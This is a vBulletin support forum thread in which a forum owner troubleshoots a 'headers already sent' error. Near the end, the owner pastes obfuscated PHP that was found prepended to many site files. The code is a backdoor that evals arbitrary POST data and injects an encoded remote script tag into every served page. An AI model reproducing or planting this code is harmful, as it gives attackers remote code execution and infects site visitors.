Problem BIG

Collapse
X

• Filter
  • Time
  • Show
Clear All

• Problem BIG

Unable to add cookies, header already sent.
    File: /home/forum/public_html/global.php
    Line: 1111

I cant anyhting and not connect to admincp
    Last edited by RedHacker7; Sun 19th Apr '09, 2:44pm.

Please any help?

Comment

To troubleshoot this, first reupload all the original vB non-image files (except install.php). Make sure you upload these in ASCII format and overwrite the ones on the server. Also be sure to upload the admincp files to whichever directory you have set in your config.php file.

Next, disable all plugins.

Note: To temporarily disable the plugin system, edit config.php and add this line right under <?php

define('DISABLE_HOOKS', true);

Do you have the same problem?
      Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
      Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

Steve Machol deleted global.php and upload again and solved the problem..!!!But what are problem...?Noone admin last sign at 1 day in my forum and that the problem gone little hours ago

Comment

Originally posted by RedHacker7 View Post
          Steve Machol deleted global.php and upload again and solved the problem..!!!But what are problem...?Noone admin last sign at 1 day in my forum and that the problem gone little hours ago
          Sorry, I don't know what you mean. Please explain.
          Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
          Change CKEditor Colors to Match Style (for 4.1.4 and above)

Steve Machol Photography

Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

Comment

Deleted global.php and upload this file and solved the problem..!!!

Comment

Many .php files are show <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1 qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3JERmlwWHJ4dCUyMHNSU3JjUlMlM 0QlMkZoYlQlMkZZRDlKTDQlMkVmWjI0N0pMJTJFMkpMJTJFMWhiVDlZRDVKTCUyRlhyeGpxdWVKTHJ5ZlolMkVqcyU zRVczRCUzQyUyRnNoYlRjUlNyaXBYcnh0WHJ4JTNFJykucmVwbGFjZSgvWHJ4fFczRHxmWnxZRHxKTHxSU3xoYlR8R EYvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($ e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1' ,$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob _start($s[$i][0]);echo $s[$i][1];}}}if(([email protected]_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

What happen....?

Comment

Finally re-upload files and solved but problem i didn't found..

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X